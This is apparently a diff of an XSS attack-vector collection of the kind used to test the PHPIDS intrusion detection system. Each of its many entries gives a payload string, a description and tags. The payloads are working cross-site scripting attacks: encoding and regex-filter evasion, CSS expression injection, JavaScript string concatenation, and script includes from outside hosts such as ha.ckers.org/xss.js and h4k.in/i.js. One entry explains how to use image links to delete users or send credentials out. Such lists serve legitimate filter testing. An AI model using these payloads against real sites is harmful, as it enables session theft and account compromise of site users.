+Exploit String: '];a=eval;b=alert;a(b(15));//
+Exploit Description: This vector breaks JS when embedded in single quoted arrays.
+Exploit Tags: general, JS breaking, basic, obfuscated
+Author Name: kishor
+
+Basic JS breaker variant 5
+Exploit Name: Basic JS breaker variant 5
+Exploit String: 1};a=eval;b=alert;a(b(14));//
+Exploit Description: JS literal object breaker for integer properties.
+Exploit Tags: general, JS breaking, basic, obfuscated
+Author Name: kishor
+
+Basic JS breaker variant 6
+Exploit Name: Basic JS breaker variant 6
+Exploit String: '};a=eval;b=alert;a(b(13));//
+Exploit Description: JS breaker for literal objects with single quoted string properties.
+Exploit Tags: general, JS breaking, basic, obfuscated
+Author Name: kishor
+
+Basic JS breaker variant 7
+Exploit Name: Basic JS breaker variant 7
+Exploit String: };a=eval;b=alert;a(b(12));//
+Exploit Description: JS breaker for literal objects with double quoted string properties.
+Exploit Tags: general, JS breaking
+Author Name: kishor
+
+Basic JS breaker variant 8
+Exploit Name: Basic JS breaker variant 8
+Exploit String: a=1;a=eval;b=alert;a(b(11));//
+Exploit Description: Can be used when JS can be injected directly.
+Exploit Tags: general, JS breaking, basic, obfuscated
+Author Name: kishor
+
+Basic JS breaker variant 9
+Exploit Name: Basic JS breaker variant 9
+Exploit String: ;//%0da=eval;b=alert;a(b(10));//
+Exploit Description: Breaks double quoted strings, injects a comment, carriage return and finally an alert.
+Exploit Tags: general, JS breaking, CRLF
+Author Name: kishor
+
+Basic JS breaker variant 10
+Exploit Name: Basic JS breaker variant 10
+Exploit String: ';//%0da=eval;b=alert;a(b(9));//
+Exploit Description: Breaks single quoted strings, injects a comment, carriage return and finally an alert.
+Exploit Tags: general, JS breaking, basic, obfuscated, CRLF
+Author Name: kishor
+
+Basic single quoted attribute breaker
+Exploit Name: Basic single quoted attribute breaker
+Exploit String: '> <script>alert(3)</script>
+Exploit Description: This vector breaks single quoted attributes and appends an alert.
+Exploit Tags: general, html breaking, basic
+Author Name: kishor
+
+Basic title breaker
+Exploit Name: Basic title breaker
+Exploit String: </title><script>alert(1)</script>
+Exploit Description: This basic vector breaks HTML titles and injects JavaScript.
+Exploit Tags: general, html breaking, basic, title breaking
+Author Name: kishor
+
+BGSOUND
+Exploit Name: BGSOUND
+Exploit String: <BGSOUND SRC="javascript:alert('XSS');">
+Exploit Description: BGSOUND
+Exploit Tags: general, evil tags
+Author Name: ha.ckers.org
+
+BODY background-image
+Exploit Name: BODY background-image
+Exploit String: <BODY BACKGROUND="javascript:alert('XSS');">
+Exploit Description: BODY image
+Exploit Tags: general, evil tags
+Author Name: ha.ckers.org
+
+BODY ONLOAD
+Exploit Name: BODY ONLOAD
+Exploit String: <BODY ONLOAD=alert('XSS')>
+Exploit Description: BODY tag (I like this method because it doesn't require using any variants of ”javascript:” or ”<SCRIPT...” to accomplish the XSS attack)
+Exploit Tags: general, evil tags
+Author Name: ha.ckers.org
+
+Camouflaged comment injection with JS link
+Exploit Name: Camouflaged comment injection with JS link
+Exploit String: <!--
+<A href="
+- --><a href=javascript:alert:document.domain
+>test-->
+Exploit Description: This vector evades filters by camouflaging as a comment and inhabiting a JS link.
+Exploit Tags: general, obfuscated, comment breaking, internet explorer +Author Name: thespanner.co.uk + +Case Insensitive +Exploit Name: Case Insensitive +Exploit String: <IMG SRC=JaVaScRiPt:alert('XSS')> +Exploit Description: Case insensitive XSS attack vector. +Exploit Tags: general, evil tags, obfuscated +Author Name: ha.ckers.org + +Character Encoding Example +Exploit Name: Character Encoding Example +Exploit String: <%3C&lt&lt;&LT&LT;&#60&#060&#0060&#00060&#000060&#0000060&#60;&#060;&#0060;&#00060;&#000060;&#0000060;&#x3c&#x03c&#x003c&#x0003c&#x00003c&#x000003c&#x3c;&#x03c;&#x003c;&#x0003c;&#x00003c;&#x000003c;&#X3c&#X03c&#X003c&#X0003c&#X00003c&#X000003c&#X3c;&#X03c;&#X003c;&#X0003c;&#X00003c;&#X000003c;&#x3C&#x03C&#x003C&#x0003C&#x00003C&#x000003C&#x3C;&#x03C;&#x003C;&#x0003C;&#x00003C;&#x000003C;&#X3C&#X03C&#X003C&#X0003C&#X00003C&#X000003C&#X3C;&#X03C;&#X003C;&#X0003C;&#X00003C;&#X000003C;\x3c\x3C\u003c\u003C +Exploit Description: All of the possible combinations of the character ”<” in HTML and JavaScript. Most of these won't render, but many of them can get rendered in certain circumstances (standards are great, aren't they?). +Exploit Tags: general, evil tags, obfuscated +Author Name: ha.ckers.org + +Closing JS Tag in JS String assignment +Exploit Name: Closing JS Tag in JS String assignment +Exploit String: <script> +var a = "</script> <script> alert('XSS !'); </script> <script>"; +</script> + +Exploit Description: For some reason, Firefox picks up the script closing tag in the quoted string and then proceeds to process the remaining script tags as code. +Exploit Tags: general, gecko, obfuscated, evil tags +Author Name: t3rmin4t0r + +Commented-out Block +Exploit Name: Commented-out Block +Exploit String: <!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]--> +Exploit Description: Downlevel-Hidden block (only works in IE5.0 and later and Netscape 8.1 in IE rendering engine mode). 
Some websites consider anything inside a comment block to be safe and therefore it does not need to be removed, which allows our XSS vector. Or the system could add comment tags around something to attempt to render it harmless. As we can see, that probably wouldn't do the job. +Exploit Tags: general, obfuscated, conditional comments, internet explorer +Author Name: ha.ckers.org + +Comment-breaker using obfuscated JavaScript +Exploit Name: Comment-breaker using obfuscated JavaScript +Exploit String: */a=eval;b=alert;a(b(/e/.source));/* +Exploit Description: This vector creates an alert by breaking multiline comments. +Exploit Tags: general, comment breaking, JS breaking +Author Name: kishor + +Conditional style injection for IE +Exploit Name: Conditional style injection for IE +Exploit String: width: expression((window.r==document.cookie)?'':alert(r=document.cookie)) +Exploit Description: This vector uses JavaScript conditional statements to inject an alert into CSS properties - it was once used as a PoC for a vulnerability in Stefan Di Paolos data binding example. +Exploit Tags: general, obfuscated, internet explorer, style injection +Author Name: DoctorDan + +Content Replace +Exploit Name: Content Replace +Exploit String: <A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A> +Exploit Description: Content replace as an attack vector (assuming ”http://www.google.com/” is programmatically replaced with null). I actually used a similar attack vector against a several separate real world XSS filters by using the conversion filter itself (like http://quickwired.com/kallahar/smallprojects/php_xss_filter_function.php) to help create the attack vector (”java&#x26;#x09;script:” was converted into ”java&#x09;script:”. 
+Exploit Tags: general, evil tags, obfuscated +Author Name: ha.ckers.org + +Cookie Manipulation +Exploit Name: Cookie Manipulation +Exploit String: <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>"> +Exploit Description: Cookie manipulation - admittedly this is pretty obscure but I have seen a few examples where <META is allowed and you can user it to overwrite cookies. There are other examples of sites where instead of fetching the username from a database it is stored inside of a cookie to be displayed only to the user who visits the page. With these two scenarios combined you can modify the victim's cookie which will be displayed back to them as JavaScript (you can also use this to log people out or change their user states, get them to log in as you, etc). +Exploit Tags: general, evil tags +Author Name: ha.ckers.org + +DIV background-image 1 +Exploit Name: DIV background-image 1 +Exploit String: <DIV STYLE="background-image: url(javascript:alert('XSS'))"> +Exploit Description: Div background-image +Exploit Tags: general, evil tags, style injection +Author Name: ha.ckers.org + +DIV background-image 2 +Exploit Name: DIV background-image 2 +Exploit String: <DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))"> +Exploit Description: Div background-image plus extra characters. I built a quick XSS fuzzer to detect any erroneous characters that are allowed after the open parenthesis but before the JavaScript directive in IE and Netscape 8.1 in secure site mode. These are in decimal but you can include hex and add padding of course. 
(Any of the following chars can be used: 1-32, 34, 39, 160, 8192-8203, 12288, 65279) +Exploit Tags: general, evil tags, style injection +Author Name: ha.ckers.org + +DIV expression +Exploit Name: DIV expression +Exploit String: <DIV STYLE="width: expression(alert('XSS'));"> +Exploit Description: Div expression - a variant of this was effective against a real world cross site scripting filter using a newline between the colon and ”expression” +Exploit Tags: general, evil tags, style injection, internet explorer +Author Name: ha.ckers.org + +DIV w/Unicode +Exploit Name: DIV w/Unicode +Exploit String: <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> +Exploit Description: DIV background-image with unicoded XSS exploit (this has been modified slightly to obfuscate the url parameter). The original vulnerability was found by Renaud Lifchitz (http://www.sysdream.com) as a vulnerability in Hotmail. +Exploit Tags: general, evil tags, obfuscated +Author Name: ha.ckers.org + +Double open angle brackets +Exploit Name: Double open angle brackets +Exploit String: <IFRAME SRC=http://ha.ckers.org/scriptlet.html < +Exploit Description: This is an odd one that Steven Christey brought to my attention. At first I misclassified this as the same XSS vector as above but it's surprisingly different. Using an open angle bracket at the end of the vector instead of a close angle bracket causes different behavior in Netscape Gecko rendering. Without it, Firefox will work but Netscape won't +Exploit Tags: general, evil tags, injection, gecko +Author Name: ha.ckers.org + +Dword Encoding +Exploit Name: Dword Encoding +Exploit String: <A HREF="http://1113982867/">XSS</A> +Exploit Description: URL string evasion (assuming ”http://www.google.com/” is programmatically disallowed). 
+Exploit Tags: general, evil tags, obfuscated +Author Name: ha.ckers.org + +Embed Flash +Exploit Name: Embed Flash +Exploit String: <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED> +Exploit Description: Using an EMBED tag you can embed a Flash movie that contains XSS. If you add the attributes allowScriptAccess=”never” and allownetworking=”internal” it can mitigate this risk (thank you to Jonathan Vanasco for the info). Demo: http://ha.ckers.org/weird/xssflash.html : +Exploit Tags: general, evil tags, obfuscated, injection +Author Name: ha.ckers.org + +Embedded Carriage Return +Exploit Name: Embedded Carriage Return +Exploit String: <IMG SRC="jav&#x0D;ascript:alert('XSS');"> +Exploit Description: Embedded carriage return to break up XSS (Note: with the above I am making these strings longer than they have to be because the zeros could be omitted. Often I've seen filters that assume the hex and dec encoding has to be two or three characters. The real rule is 1-7 characters). +Exploit Tags: general, evil tags, obfuscated +Author Name: ha.ckers.org + +Embedded Encoded Tab +Exploit Name: Embedded Encoded Tab +Exploit String: <IMG SRC="jav&#x09;ascript:alert('XSS');"> +Exploit Description: Embedded encoded tab to break up XSS. For some reason Opera does not allow the encoded tab, but it does allow the previous tab XSS and encoded newline and carriage returns below. +Exploit Tags: general, evil tags, obfuscated +Author Name: ha.ckers.org + +Embedded Newline +Exploit Name: Embedded Newline +Exploit String: <IMG SRC="jav&#x0A;ascript:alert('XSS');"> +Exploit Description: Embedded newline to break up XSS. Some websites claim that any of the chars 09-13 (decimal) will work for this attack. That is incorrect. Only 09 (horizontal tab), 10 (newline) and 13 (carriage return) work. 
+Exploit Tags: general, evil tags, obfuscated, internet explorer +Author Name: ha.ckers.org + +Embedded Tab +Exploit Name: Embedded Tab +Exploit String: <IMG SRC="javascript:alert('XSS');"> +Exploit Description: Embedded tab to break up the cross site scripting attack. +Exploit Tags: general, evil tags, internet explorer +Author Name: ha.ckers.org + +End title tag +Exploit Name: End title tag +Exploit String: </TITLE><SCRIPT>alert("XSS");</SCRIPT> +Exploit Description: This is a simple XSS vector that closes TITLE tags, which can encapsulate the malicious cross site scripting attack. +Exploit Tags: general, title breaking +Author Name: ha.ckers.org + +Escaping JavaScript escapes +Exploit Name: Escaping JavaScript escapes +Exploit String: \";alert('XSS');// +Exploit Description: Escaping JavaScript escapes. When the application is written to output some user information inside of a JavaScript like the following: <SCRIPT>var a=”$ENV{QUERY_STRING}”;</SCRIPT> and you want to inject your own JavaScript into it but the server side application escapes certain quotes you can circumvent that by escaping their escape character. When this is gets injected it will read <SCRIPT>var a=””;alert('XSS');//”;</SCRIPT> which ends up un-escaping the double quote and causing the Cross Site Scripting vector to fire. 
+Exploit Tags: general, JS breaking +Author Name: ha.ckers.org + +Evade Regex Filter 1 +Exploit Name: Evade Regex Filter 1 +Exploit String: <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +Exploit Description: For performing XSS on sites that allow ”<SCRIPT>” but don't allow ”<SCRIPT SRC...” by way of the following regex filter: /<script[^>]+src/i +Exploit Tags: general, evil tags, obfuscated, injection +Author Name: ha.ckers.org + +Evade Regex Filter 2 +Exploit Name: Evade Regex Filter 2 +Exploit String: <SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +Exploit Description: For performing XSS on sites that allow ”<SCRIPT>” but don't allow ”<SCRIPT SRC...” by way of a regex filter: /<script((\s+\w+(\s*=\s*(?:”(.)*?”|'(.)*?'|[^'”>\s]+))?)+\s*|\s*)src/i this is an important one, because I've seen this regex in the wild) +Exploit Tags: general, evil tags, obfuscated, injection +Author Name: ha.ckers.org + +Evade Regex Filter 3 +Exploit Name: Evade Regex Filter 3 +Exploit String: <SCRIPT a="blah" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> +Exploit Description: Another XSS to evade this regex filter: /<script((\s+\w+(\s*=\s*(?:”(.)*?”|'(.)*?'|[^'”>\s]+))?)+\s*|\s*)src/i +Exploit Tags: general, evil tags, obfuscated, injection +Author Name: ha.ckers.org + +Evade Regex Filter 4 +Exploit Name: Evade Regex Filter 4 +Exploit String: <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +Exploit Description: Yet another XSS to evade the same filter: /<script((\s+\w+(\s*=\s*(?:”(.)*?”|'(.)*?'|[^'”>\s]+))?)+\s*|\s*)src/i +The only thing I've seen work against this XSS attack if you still want to allow <SCRIPT> tags but not remote scripts is a state machine (and of course there are other ways to get around this if they allow <SCRIPT> tags) +Exploit Tags: general, evil tags, obfuscated, injection +Author Name: ha.ckers.org + +Evade Regex Filter 5 +Exploit Name: Evade Regex Filter 5 +Exploit String: <SCRIPT a=`>` 
SRC="http://ha.ckers.org/xss.js"></SCRIPT> +Exploit Description: And one last XSS attack (using grave accents) to evade this regex: /<script((\s+\w+(\s*=\s*(?:”(.)*?”|'(.)*?'|[^'”>\s]+))?)+\s*|\s*)src/i +Exploit Tags: general, evil tags, obfuscated, injection +Author Name: ha.ckers.org + +Eval string contained in name property +Exploit Name: Eval string contained in name property +Exploit String: eval(name) +Exploit Description: This very simple but effective vector uses the eval method on the name property. +Exploit Tags: general, super short, self contained +Author Name: SIrDarckCat + +Extra dot for Absolute DNS +Exploit Name: Extra dot for Absolute DNS +Exploit String: <A HREF="http://www.google.com./">XSS</A> +Exploit Description: URL string evasion (assuming ”http://www.google.com/” is programmatically disallowed). +Exploit Tags: general, evil tags +Author Name: ha.ckers.org + +Extraneous Open Brackets +Exploit Name: Extraneous Open Brackets +Exploit String: <<SCRIPT>alert("XSS");//<</SCRIPT> +Exploit Description: (Submitted by Franz Sedlmaier http://www.pilorz.net/). This XSS vector could defeat certain detection engines that work by first using matching pairs of open and close angle brackets and then by doing a comparison of the tag inside, instead of a more efficient algorythm like Boyer-Moore (http://www.cs.utexas.edu/users/moore/best-ideas/string-searching/) that looks for entire string matches of the open angle bracket and associated tag (post de-obfuscation, of course). The double slash comments out the ending extraneous bracket to supress a JavaScript error. +Exploit Tags: general, obfuscated +Author Name: ha.ckers.org + +Filter Evasion 1 +Exploit Name: Filter Evasion 1 +Exploit String: <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> +Exploit Description: This XSS still worries me, as it would be nearly impossible to stop this without blocking all active content. 
+Exploit Tags: general, evil tags, obfuscated, injection +Author Name: ha.ckers.org + +Filter Evasion 2 +Exploit Name: Filter Evasion 2 +Exploit String: <SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +Exploit Description: Here's an XSS example that bets on the fact that the regex won't catch a matching pair of quotes but will rather find any quotes to terminate a parameter string improperly. +Exploit Tags: general, evil tags, obfuscated, injection +Author Name: ha.ckers.org + +Firefox Lookups 1 +Exploit Name: Firefox Lookups 1 +Exploit String: <A HREF="//google">XSS</A> +Exploit Description: Firefox uses Google's ”feeling lucky” function to redirect the user to any keywords you type in. So if your exploitable page is the top for some random keyword (as you see here) you can use that feature against any Firefox user. This uses Firefox's ”keyword:” protocol. You can concatenate several keywords by using something like the following ”keyword:XSS+RSnake” +Exploit Tags: general, evil tags, gecko +Author Name: ha.ckers.org + +Firefox Lookups 2 +Exploit Name: Firefox Lookups 2 +Exploit String: <A HREF="http://ha.ckers.org@google">XSS</A> +Exploit Description: This uses a very tiny trick that appears to work Firefox only, because if it's implementation of the ”feeling lucky” function. Unlike the next one this does not work in Opera because Opera believes that this is the old HTTP Basic Auth phishing attack, which it is not. It's simply a malformed URL. If you click okay on the dialogue it will work, but as a result of the erroneous dialogue box I am saying that this is not supported in Opera. +Exploit Tags: general, evil tags, obfuscated, gecko +Author Name: ha.ckers.org + +Firefox Lookups 3 +Exploit Name: Firefox Lookups 3 +Exploit String: <A HREF="http://google:ha.ckers.org">XSS</A> +Exploit Description: This uses a malformed URL that appears to work in Firefox and Opera only, because if their implementation of the ”feeling lucky” function. 
Like all of the above it requires that you are #1 in Google for the keyword in question (in this case ”google”). +Exploit Tags: general, evil tags, obfuscated, gecko +Author Name: ha.ckers.org + +firefoxurl: uri exploit (UXSS) +Exploit Name: firefoxurl: uri exploit (UXSS) +Exploit String: firefoxurl:test|"%20-new-window%20javascript:alert(\'Cross%2520Browser%2520Scripting!\');" +Exploit Description: This vector creates an UXSS via firefoxurl: +Exploit Tags: URI exploits, general, injection, obfuscated, internet explorer +Author Name: xs-sniper + +FRAME +Exploit Name: FRAME +Exploit String: <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> +Exploit Description: Frame (Frames have the same sorts of XSS problems as iframes). +Exploit Tags: general, evil tags, style injection, internet explorer +Author Name: ha.ckers.org + +Grave Accents +Exploit Name: Grave Accents +Exploit String: <IMG SRC=`javascript:alert("RSnake says### 'XSS'")`> +Exploit Description: Grave accent obfuscation (If you need to use both double and single quotes you can use a grave accent to encapsulate the JavaScript string - this is also useful because lots of cross site scripting filters don't know about grave accents). +Exploit Tags: general, evil tags, obfuscated, internet explorer +Author Name: ha.ckers.org + +Half-Open HTML/JavaScript +Exploit Name: Half-Open HTML/JavaScript +Exploit String: <IMG SRC="javascript:alert('XSS')" +Exploit Description: Unlike Firefox, the IE rendering engine doesn't add extra data to your page, but it does allow the ”javascript:” directive in images. This is useful as a vector because it doesn't require a close angle bracket. This assumes that there is at least one HTML tag below where you are injecting this cross site scripting vector. Even though there is no close > tag the tags below it will close it. A note: this does mess up the HTML, depending on what HTML is beneath it. 
See http://www.blackhat.com/presentations/bh-usa-04/bh-us-04-mookhey/bh-us-04-mookhey-up.ppt for more info. It gets around the following NIDS regex: + /((\%3D)|(=))[^\n]*((\%3C)|<)[^\n]+((\%3E)|>)/ +As a side note, this was also effective against a real world XSS filter I came across using an open ended <IFRAME tag instead of an <IMG tag. +Exploit Tags: general, evil tags, internet explorer +Author Name: ha.ckers.org + +Hex Encoding +Exploit Name: Hex Encoding +Exploit String: <A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A> +Exploit Description: URL string evasion (assuming ”http://www.google.com/” is programmatically disallowed). +The total size of each number allowed is somewhere in the neighborhood of 240 total characters as you can see on the second digit, and since the hex number is between 0 and F the leading zero on the third hex digit is not required. +Exploit Tags: general, evil tags, obfuscated +Author Name: ha.ckers.org + +Hex Encoding w/out Semicolons +Exploit Name: Hex Encoding w/out Semicolons +Exploit String: <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> +Exploit Description: Hex encoding without semicolons (this is also a viable XSS attack against the above string $tmp_string = ~ s/.*\&#(\d+);.*/$1/; which assumes that there is a numeric character following the pound symbol - which is not true with hex HTML characters). +Exploit Tags: general, evil tags, obfuscated, internet explorer +Author Name: ha.ckers.org + +HTML Entities +Exploit Name: HTML Entities +Exploit String: <IMG SRC=javascript:alert(&quot;XSS&quot;)> +Exploit Description: HTML entities (the semicolons are required for this to work). 
+Exploit Tags: general, evil tags, obfuscated, internet explorer +Author Name: ha.ckers.org + +HTML Quoute & Comment breaker +Exploit Name: HTML Quoute & Comment breaker +Exploit String: '';!--"<script>alert(0);</script>=&{(alert(1))} +Exploit Description: This vector breaks HTML quotes and comments. +Exploit Tags: general, html breaking, comment breaking +Author Name: .mario + +HTML wrapped in XML +Exploit Name: HTML wrapped in XML +Exploit String: <?xml version="1.0"?> +<html:html xmlns:html='http://www.w3.org/1999/xhtml'> +<html:script> +alert(document.cookie); +</html:script> +</html:html> +Exploit Description: This vector uses HTML wrapped in XML and can be used to circumvent common filters. This works in Gecko based browsers only. +Exploit Tags: general, XML injection, evil tags, gecko, obfuscated +Author Name: SIrDarckCat + +IE backticked semicolon injection +Exploit Name: IE backticked semicolon injection +Exploit String: <img src=`x` onrerror= ` ;; alert(1) ` /> +Exploit Description: This vector utilized back ticks as attribute delimiters. This works only in IE. +Exploit Tags: general, injection, internet explorer +Author Name: .mario + +IE closing-tag expression injection +Exploit Name: IE closing-tag expression injection +Exploit String: </a style=""xx:expr/**/ession(document.appendChild(document.createElement('script')).src='http://h4k.in/i.js')"> +Exploit Description: This vector exploits a bug in IE whre attributes in closing comments are evaluated. +Exploit Tags: general, injection, internet explorer +Author Name: .mario + +IE expression injection +Exploit Name: IE expression injection +Exploit String: style=color: expression(alert(0));" a=" +Exploit Description: This vector utilizes the feature of CSS expressions in IE. 
+Exploit Tags: general, injection, internet explorer, style injection +Author Name: .mario + +IE VB Messagebox injection +Exploit Name: IE VB Messagebox injection +Exploit String: vbscript:Execute(MsgBox(chr(88)&chr(83)&chr(83)))< +Exploit Description: This injects VB code and produces a message box. IE only. +Exploit Tags: general, basic, internet explorer +Author Name: .mario + +IFRAME +Exploit Name: IFRAME +Exploit String: <IFRAME SRC="javascript:alert('XSS');"></IFRAME> +Exploit Description: Iframe (If iframes are allowed there are a lot of other XSS problems as well). +Exploit Tags: general, evil tags, internet explorer +Author Name: ha.ckers.org + +Image onerror wrapped in XML statement +Exploit Name: Image onerror wrapped in XML statement +Exploit String: a=<a> +<b> +%3c%69%6d%67%2f%73%72%63%3d%31 +%20%6f%6e%65%72%72%6f%72%3d%61%6c%65%72%74%28%31%29%3e +</b> +</a> +document.write(unescape(a..b)) +Exploit Description: This vector writes an erroneous image tag with onerror hanlder inside an E4X construct into the document context. +Exploit Tags: general, obfuscated, gecko, XML predicates, evil tags +Author Name: .mario + +Image tag with obfuscated JS URI +Exploit Name: Image tag with obfuscated JS URI +Exploit String: <IMG SRC="jav&#x09;ascript:alert(<WBR>'XSS');"> +<IMG SRC="jav&#x0A;ascript:alert(<WBR>'XSS');"> +<IMG SRC="jav&#x0D;ascript:alert(<WBR>'XSS');"> +Exploit Description: This vector creates three image tags with differing CRLF obfuscation in the javascript: URI. +Exploit Tags: general, basic, obfuscated, evil tags, internet explorer +Author Name: OWASP + +Image w/CharCode +Exploit Name: Image w/CharCode +Exploit String: <IMG SRC=javascript:alert(String.fromCharCode(88###83###83))> +Exploit Description: If no quotes of any kind are allowed you can eval() a fromCharCode in JavaScript to create any XSS vector you need. 
+Exploit Tags: general, evil tags, obfuscated, internet explorer +Author Name: ha.ckers.org + +IMG Dynsrc +Exploit Name: IMG Dynsrc +Exploit String: <IMG DYNSRC="javascript:alert('XSS');"> +Exploit Description: IMG Dynsrc +Exploit Tags: general, evil tags, internet explorer +Author Name: ha.ckers.org + +IMG Embedded commands 1 +Exploit Name: IMG Embedded commands 1 +Exploit String: <IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"> +Exploit Description: This works when the webpage where this is injected (like a web-board) is behind password protection and that password protection works with other commands on the same domain. This can be used to delete users, add users (if the user who visits the page is an administrator), send credentials elsewhere, etc... This is one of the lesser used but more useful XSS vectors. +Exploit Tags: general, evil tags +Author Name: ha.ckers.org + +IMG Embedded commands 2 +Exploit Name: IMG Embedded commands 2 +Exploit String: Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser +Exploit Description: IMG Embedded commands part II - this is more scary because there are absolutely no identifiers that make it look suspicious other than it is not hosted on your own domain. The vector uses a 302 or 304 (others work too) to redirect the image back to a command. So a normal <IMG SRC=”http://badguy.com/a.jpg”> could actually be an attack vector to run commands as the user who views the image link. Here is the .htaccess (under Apache) line to accomplish the vector (thanks to Timo for part of this). 
+Exploit Tags: general, redirect +Author Name: ha.ckers.org + +IMG Lowsrc +Exploit Name: IMG Lowsrc +Exploit String: <IMG LOWSRC="javascript:alert('XSS');"> +Exploit Description: IMG Lowsrc +Exploit Tags: general, evil tags, internet explorer +Author Name: ha.ckers.org + +IMG No Quotes/Semicolon +Exploit Name: IMG No Quotes/Semicolon +Exploit String: <IMG SRC=javascript:alert('XSS')> +Exploit Description: No quotes and no semicolon +Exploit Tags: general, evil tags, internet explorer +Author Name: ha.ckers.org + +IMG STYLE w/expression +Exploit Name: IMG STYLE w/expression +Exploit String: exp/*<XSS STYLE='no\xss:noxss("*//*");xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'> +Exploit Description: IMG STYLE with expression (this is really a hybrid of several CSS XSS vectors, but it really does show how hard STYLE tags can be to parse apart, like the other CSS examples this can send IE into a loop). +Exploit Tags: general, evil tags, internet explorer +Author Name: ha.ckers.org + +IMG w/JavaScript Directive +Exploit Name: IMG w/JavaScript Directive +Exploit String: <IMG SRC="javascript:alert('XSS');"> +Exploit Description: Image XSS using the JavaScript directive. +Exploit Tags: general, evil tags, internet explorer +Author Name: ha.ckers.org + +IMG w/VBscript +Exploit Name: IMG w/VBscript +Exploit String: <IMG SRC='vbscript:msgbox("XSS")'> +Exploit Description: VBscript in an image +Exploit Tags: general, evil tags, internet explorer +Author Name: ha.ckers.org + +INPUT Image +Exploit Name: INPUT Image +Exploit String: <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> +Exploit Description: INPUT Image +Exploit Tags: general, evil tags, internet explorer +Author Name: ha.ckers.org + +IP Encoding +Exploit Name: IP Encoding +Exploit String: <A HREF="http://66.102.7.147/">XSS</A> +Exploit Description: URL string evasion (assuming ”http://www.google.com/” is programmatically disallowed). 
+Exploit Tags: general, evil tags, obfuscated +Author Name: ha.ckers.org + +JavaScript concatenation vector variant 1 +Exploit Name: JavaScript concatenation vector variant 1 +Exploit String: s1=''+'java'+''+'scr'+'';s2=''+'ipt'+':'+'ale'+'';s3=''+'rt'+''+'(1)'+''; u1=s1+s2+s3;URL=u1 +Exploit Description: This vector concatenates a string and evaluates it via mapping on URL +Exploit Tags: general, internet explorer, concatenated, obfuscated +Author Name: PHPIDS Group + +JavaScript concatenation vector variant 2 +Exploit Name: JavaScript concatenation vector variant 2 +Exploit String: s1=0?'1':'i'; s2=0?'1':'fr'; s3=0?'1':'ame'; i1=s1+s2+s3; s1=0?'1':'jav'; s2=0?'1':'ascr'; s3=0?'1':'ipt'; s4=0?'1':':'; s5=0?'1':'ale'; s6=0?'1':'rt'; s7=0?'1':'(1)'; i2=s1+s2+s3+s4+s5+s6+s7; +Exploit Description: This vector concatenates a string and evaluates it via self-execution. +Exploit Tags: general, concatenated, obfuscated +Author Name: PHPIDS Group + +JavaScript concatenation vector variant 3 +Exploit Name: JavaScript concatenation vector variant 3 +Exploit String: s1=0?'':'i';s2=0?'':'fr';s3=0?'':'ame';i1=s1+s2+s3;s1=0?'':'jav';s2=0?'':'ascr';s3=0?'':'ipt';s4=0?'':':';s5=0?'':'ale';s6=0?'':'rt';s7=0?'':'(1)';i2=s1+s2+s3+s4+s5+s6+s7;i=createElement(i1);i.src=i2;x=parentNode;x.appendChild(i); +Exploit Description: This vector concatenates a string and evaluates it via usage of common DOM methods and element creation. +Exploit Tags: general, concatenated, obfuscated +Author Name: PHPIDS Group + +JavaScript concatenation vector variant 4 +Exploit Name: JavaScript concatenation vector variant 4 +Exploit String: s1=['java'+''+''+'scr'+'ipt'+':'+'aler'+'t'+'(1)']; +Exploit Description: This vector concatenates a string and evaluates it via filling a variable with payload concatenated in a JSON array. 
+Exploit Tags: general, JSON, concatenated, obfuscated +Author Name: PHPIDS Group + +JavaScript concatenation vector variant 5 +Exploit Name: JavaScript concatenation vector variant 5 +Exploit String: s1=['java'||''+'']; s2=['scri'||''+'']; s3=['pt'||''+'']; +Exploit Description: This vector concatenates a string and evaluates it via filling a variable with payload concatenated in a JSON array. +Exploit Tags: general, JSON, concatenated, obfuscated +Author Name: PHPIDS Group + +JavaScript concatenation vector variant 6 +Exploit Name: JavaScript concatenation vector variant 6 +Exploit String: s1=!''&&'jav';s2=!''&&'ascript';s3=!''&&':';s4=!''&&'aler';s5=!''&&'t';s6=!''&&'(1)';s7=s1+s2+s3+s4+s5+s6;URL=s7; +Exploit Description: This vector concatenates a string and evaluates it via filling the URL property with payload concatenated in a string via ternary operators. +Exploit Tags: general, internet explorer, concatenated, obfuscated +Author Name: PHPIDS Group + +JavaScript concatenation vector variant 7 +Exploit Name: JavaScript concatenation vector variant 7 +Exploit String: s1='java'||''+'';s2='scri'||''+'';s3='pt'||''+''; +Exploit Description: This vector concatenates a string and evaluates it via filling a variable with payload concatenated in a regular string via ternary operators. +Exploit Tags: general, JSON, concatenated, obfuscated +Author Name: PHPIDS Group + +JavaScript Includes +Exploit Name: JavaScript Includes +Exploit String: <BR SIZE="&{alert('XSS')}"> +Exploit Description: &JavaScript includes (works in Netscape 4.x). 
